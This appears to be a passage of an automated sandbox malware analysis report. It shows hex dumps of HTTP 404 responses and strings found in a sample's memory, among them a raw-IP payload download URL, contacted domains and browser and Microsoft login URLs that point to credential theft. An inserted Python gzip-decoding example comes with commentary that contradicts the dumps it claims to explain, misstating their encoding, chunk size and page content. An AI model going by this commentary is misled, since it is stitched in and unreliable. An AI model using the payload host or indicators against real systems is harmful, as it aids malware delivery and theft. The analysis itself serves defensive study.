6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 
6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 
6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:50 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:18:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
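        The first two responses above carry their body as raw hex of a chunked, gzip-encoded stream: the chunk-size line 31 37 33 0d 0a is "173" in hex (371 bytes of gzip data), the stream opens with the 1f 8b magic, and its last four bytes 59 02 00 00 are the gzip ISIZE trailer, 601 in little-endian, which is exactly the Content-Length of the uncompressed German 404 page in the third response. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds a body from a 'Data Raw' hex string by de-chunking, reading ISIZE from the trailer without inflating (useful when a dump is truncated or the deflate data is damaged), and then inflating with CRC verification. The sample dump it parses is constructed here from that 601-byte page rather than copied from the report's hex.

```python
import gzip
import struct
from typing import Tuple

# Constructed sample body (not taken from the report's hex): the German Apache
# 404 page that a later response in the report carries uncompressed, rebuilt
# here line by line. It is 601 bytes, the Content-Length of that response.
SAMPLE_HTML = "".join([
    '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\n',
    '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n',
    '<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">\n',
    ' <head>\n',
    '  <title>\n',
    '   Error 404 - Not found\n',
    '  </title>\n',
    '  <meta content="text/html; charset=utf-8" http-equiv="Content-Type">\n',
    '  <meta content="no-cache" http-equiv="cache-control">\n',
    ' </head>\n',
    ' <body style="font-family:arial;">\n',
    '  <h1 style="color:#0a328c;font-size:1.0em;">\n',
    '   Error 404 - Not found\n',
    '  </h1>\n',
    '  <p style="font-size:0.8em;">\n',
    '   Die angegebene Seite konnte nicht gefunden werden.\n',
    '  </p>\n',
    ' </body>\n',
    '</html>\n',
]).encode()


def build_data_raw(body: bytes) -> str:
    """Package a body the way the first responses in the report were delivered
    (gzip, then one HTTP/1.1 chunk followed by the terminating 0 chunk) and
    render it as the space-separated hex of the report's 'Data Raw' field."""
    gz = gzip.compress(body, mtime=0)
    chunked = f"{len(gz):x}\r\n".encode() + gz + b"\r\n0\r\n\r\n"
    return chunked.hex(" ")


def dechunk(raw: bytes) -> bytes:
    """Reassemble a chunked transfer encoding: hex size line, data, CRLF, ..., '0' chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ValueError(f"chunk data at offset {pos} not followed by CRLF")
        pos += 2


def gzip_isize(gz: bytes) -> int:
    """The last four bytes of a gzip member hold the uncompressed length (mod 2**32).
    Reading them needs no inflation, so the check still works when the dump is
    truncated elsewhere or the deflate stream itself is damaged."""
    if gz[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    return struct.unpack("<I", gz[-4:])[0]


def decode_data_raw(hexdump: str, chunked: bool = True) -> Tuple[int, bytes]:
    """Turn a 'Data Raw' hex string into (ISIZE from the trailer, inflated body).
    gzip.decompress also verifies the CRC32, so a corrupted dump fails loudly here."""
    raw = bytes.fromhex(hexdump)
    gz = dechunk(raw) if chunked else raw
    return gzip_isize(gz), gzip.decompress(gz)


if __name__ == "__main__":
    dump = build_data_raw(SAMPLE_HTML)
    isize, body = decode_data_raw(dump)
    print(f"ISIZE={isize} decoded={len(body)} bytes match={body == SAMPLE_HTML}")
    print(body.decode()[:80])
```

        Applied to the report's own first response, the same ISIZE check gives 601 before any inflation is attempted, which is how the two Apache responses can be tied together even though one is gzip-chunked and the other is plain.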
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin.
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin3c
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.binO
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/It3
        Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/NTIFIER=Intel64
        Source: Untapestried.exe, 00000007.00000002.2158641488.000000000475D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://103.14.155.180/i
        Source: cmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M
        Source: 160420241245287.exe, Untapestried.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.eternalsunrise.xyz
        Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.eternalsunrise.xyz/9pdo/
        Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBqq
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: cmd.exe, 0000000C.00000002.2886759611.00000000029D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
